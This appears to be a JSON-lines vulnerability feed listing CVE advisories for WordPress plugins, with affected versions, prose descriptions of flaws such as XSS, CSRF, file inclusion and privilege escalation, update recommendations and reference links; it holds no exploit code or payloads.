{"CVE_ID":"CVE-2024-6552","slug":"ameliabooking","versionImpact":"1.2","versionEndExcluding":"1.2.1","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/vendor\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/cookie_max_age.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/vendor\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/cookie_max_age.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130903%40ameliabooking&new=3130903%40ameliabooking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130903%40ameliabooking&new=3130903%40ameliabooking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2654","slug":"conditional-menus","versionEndExcluding":"1.2.1","description":"The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/506ecee9-8e42-46de-9c5c-fc252ab2646e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/506ecee9-8e42-46de-9c5c-fc252ab2646e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1401","slug":"facebook-likebox-widget-and-shortcode","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Profile Box Shortcode And Widget WordPress plugin before 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91064ba5-cf65-46e6-88df-0e4d96a3ef9f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91064ba5-cf65-46e6-88df-0e4d96a3ef9f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11904","slug":"mshop-naver-talktalk","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The ???? ??? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'msntt_add_plus_talk' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202813\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202813\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11881","slug":"easy-waveform-player","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easywaveformplayer' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208124\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208124\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5345","slug":"responsive-owl-carousel-elementor","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Responsive Owl Carousel for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.2.0 via the layout parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The inclusion is limited to PHP files.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0638c8f3-070a-4b42-ba58-396f3f259b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0638c8f3-070a-4b42-ba58-396f3f259b9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel-elementor\\\/trunk\\\/includes\\\/widgets\\\/owl-carousel.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel-elementor\\\/trunk\\\/includes\\\/widgets\\\/owl-carousel.php#L669\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092511%40responsive-owl-carousel-elementor%2Ftrunk&old=3092226%40responsive-owl-carousel-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092511%40responsive-owl-carousel-elementor%2Ftrunk&old=3092226%40responsive-owl-carousel-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2169","slug":"currency-switcher","versionImpact":"1.2.0.4","versionEndExcluding":"1.2.0.5","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher\\\/trunk\\\/index.php#L1920\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher\\\/trunk\\\/index.php#L1920\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249625%40currency-switcher&new=3249625%40currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249625%40currency-switcher&new=3249625%40currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253183%40currency-switcher&new=3253183%40currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253183%40currency-switcher&new=3253183%40currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb24ae0-41d6-4d8f-917c-dfd058a7a49d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb24ae0-41d6-4d8f-917c-dfd058a7a49d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51506","slug":"currency-switcher","versionImpact":"1.2.0","versionEndExcluding":"1.2.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WPCS \u2013 WordPress Currency Switcher Professional allows Stored XSS. This issue affects WPCS \u2013 WordPress Currency Switcher Professional: from n\/a through 1.2.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/currency-switcher\\\/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/currency-switcher\\\/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11388","slug":"dino-game","versionImpact":"1.1.0","versionEndExcluding":"1.2.0","description":"The Dino Game \u2013 Embed Google Chrome Dinosaur Game in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dino-game' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dino-game\\\/trunk\\\/dino-game.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dino-game\\\/trunk\\\/dino-game.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1acc5f8-bd77-42e0-96d5-636039a533a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1acc5f8-bd77-42e0-96d5-636039a533a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2933","slug":"wp-update-mail-notification","versionImpact":"1.1.6","versionEndExcluding":"1.2.0","description":"The Email Notifications for Updates plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the awun_import_settings() function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3265589%40wp-update-mail-notification&new=3265589%40wp-update-mail-notification\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3265589%40wp-update-mail-notification&new=3265589%40wp-update-mail-notification\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d52e644b-a58f-4e09-9e53-e9cbef75e34f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d52e644b-a58f-4e09-9e53-e9cbef75e34f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2964","slug":"simple-iframe","versionEndExcluding":"1.2.0","description":"The Simple Iframe WordPress plugin before 1.2.0 does not properly validate one of its WordPress block attribute's content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97aac334-5323-41bb-90f0-d180bcc9162f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97aac334-5323-41bb-90f0-d180bcc9162f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5843","slug":"ads-by-datafeedrcom","versionImpact":"1.1.3","versionEndExcluding":"1.2.0","description":"The Ads by datafeedr.com plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 1.1.3 via the 'dfads_ajax_load_ads' function. This allows unauthenticated attackers to execute code on the server. The parameters of the callable function are limited, they cannot be specified arbitrarily.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ads-by-datafeedrcom\\\/tags\\\/1.1.3\\\/inc\\\/dfads.class.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ads-by-datafeedrcom\\\/tags\\\/1.1.3\\\/inc\\\/dfads.class.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5412fd87-49bc-445c-8d16-443e38933d1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5412fd87-49bc-445c-8d16-443e38933d1e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6541","slug":"allow-svg","versionImpact":"1.1","versionEndExcluding":"1.2.0","description":"The Allow SVG WordPress plugin before 1.2.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbe866b8-7497-4e5c-8f59-bb8edac1dc71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbe866b8-7497-4e5c-8f59-bb8edac1dc71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3372","slug":"lana-shortcodes","versionImpact":"1.1.1","versionEndExcluding":"1.2.0","description":"The Lana Shortcodes WordPress plugin before 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3396b734-9a10-4070-802d-f9d01cc6eb74\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3396b734-9a10-4070-802d-f9d01cc6eb74\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13521","slug":"mailup-auto-subscribtion","versionImpact":"1.1.0","versionEndExcluding":"1.2.0","description":"The MailUp Auto Subscription plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the mas_options function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3060078%40mailup-auto-subscribtion%2Ftags%2F1.1.0&new=3229728%40mailup-auto-subscribtion%2Ftags%2F1.2.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3060078%40mailup-auto-subscribtion%2Ftags%2F1.1.0&new=3229728%40mailup-auto-subscribtion%2Ftags%2F1.2.0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ee9b2e9-e3fe-43b2-9caf-7246a4201fe9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ee9b2e9-e3fe-43b2-9caf-7246a4201fe9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1689","slug":"tmm_paypal_checkout","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The ThemeMakers PayPal Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'paypal' shortcode in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_paypal_checkout\\\/commit\\\/d6d3b1877ed705ac171cf7e74a6e866fc135ba22\",\"name\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_paypal_checkout\\\/commit\\\/d6d3b1877ed705ac171cf7e74a6e866fc135ba22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6390dba6-423b-48be-b5f0-1018d94f4a32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6390dba6-423b-48be-b5f0-1018d94f4a32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10124","slug":"vayu-blocks","versionImpact":"1.1.1","versionEndExcluding":"1.2.0","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/core\\\/class-installation.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/core\\\/class-installation.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173408\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173408\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203532\\\/vayu-blocks\\\/tags\\\/1.2.0\\\/inc\\\/vayu-sites\\\/app.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203532\\\/vayu-blocks\\\/tags\\\/1.2.0\\\/inc\\\/vayu-sites\\\/app.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9417","slug":"hash-form","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to limited file uploads due to a misconfigured file type validation in the 'handleUpload' function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to upload files that are excluded from both the 'allowedExtensions' and 'unallowed_extensions' arrays on the affected site's server, including files that may contain cross-site scripting.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad7731a-1f81-4055-9b49-15b35edd3fcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad7731a-1f81-4055-9b49-15b35edd3fcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161828\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161828\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11866","slug":"bmlt-tabbed-map","versionImpact":"1.1.8","versionEndExcluding":"1.2.0","description":"The BMLT Tabbed Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bmlt_tabbed_map' shortcode in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198537%40bmlt-tabbed-map&new=3198537%40bmlt-tabbed-map&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198537%40bmlt-tabbed-map&new=3198537%40bmlt-tabbed-map&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49958e9e-7f9b-48fb-bfe2-5b1b437171d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49958e9e-7f9b-48fb-bfe2-5b1b437171d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1054","slug":"uicore-elements","versionImpact":"1.0.16","versionEndExcluding":"1.2.0","description":"The UiCore Elements \u2013 Free Elementor widgets and templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the UI Counter, UI Icon Box, UI Testimonial Slider, UI Testimonial Grid, and UI Testimonial Carousel widgets in all versions up to, and including, 1.0.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253371\\\/uicore-elements\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253371\\\/uicore-elements\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74e8541-9726-4bc2-9fbd-f6016490e0ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74e8541-9726-4bc2-9fbd-f6016490e0ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5537","slug":"delete-usermetas","versionImpact":"1.1.2","versionEndExcluding":"1.2.0","description":"The Delete Usermeta plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing nonce validation on the delumet_options_page() function. This makes it possible for unauthenticated attackers to remove user meta for arbitrary users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b46e5b-ce1e-4215-921c-edea7fd6c56a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b46e5b-ce1e-4215-921c-edea7fd6c56a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-usermetas\\\/trunk\\\/delete-usermetas.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-usermetas\\\/trunk\\\/delete-usermetas.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2979918%40delete-usermetas&new=2979918%40delete-usermetas&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2979918%40delete-usermetas&new=2979918%40delete-usermetas&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12414","slug":"themify-store-locator","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The Themify Store Locator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the setting_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched 